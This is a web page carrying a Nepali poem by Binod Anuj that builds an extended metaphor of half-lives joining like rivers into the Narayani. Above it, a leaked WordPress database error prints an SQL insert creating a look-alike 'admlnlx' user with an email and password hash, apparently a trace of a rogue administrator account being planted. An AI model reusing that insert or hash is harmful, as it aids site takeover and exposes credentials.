WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIlyPnTNxGIJWMW8vRRA.wO0.sNrDU1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 20:03:53', '', 'admlnlx', 'admlnlx')
कालिगण्डकिको पानीभित्र देखिएको
आधा चन्द्रमाको रंग जस्तो
चम्किएको छ
तिम्रो मुहारको आधा रंग
तर
चन्द्रमाको नदेखिएको आधा भागजस्तो
अदृश्य छैन
तिम्रो आँखामा छल्किएको
सागरको छाल
आधा खालि चियाको गिलास
रित्तिंदै गए झैं
आधा रित्तिएका जस्ता छन्
तिम्रा आँखाका सपना।
बहाव गुमाएको
आधा लेखेर छोडिएको कविता जस्ता
अधुरा छन्
तिम्रा ओंठका पंक्ति।
पुरा नारायणीमा पनि छ
कालिगण्डकि आधा,
त्रीशुलि आधा।
आउ
चन्द्रमा पूर्ण हुनुभन्दा पहिले,
रित्तिनु अघी चियाको गिलास,
सिध्दिनु अघी आँखाका सपना
र गुम्नु अघी कविताको लय
मिसाउँ हाम्रा
आधा आधा जिन्दगी
र बनाउँ यौटा सिङ्गो नारायणी
हार्दिकताको।
लेखकः विनोद अनुज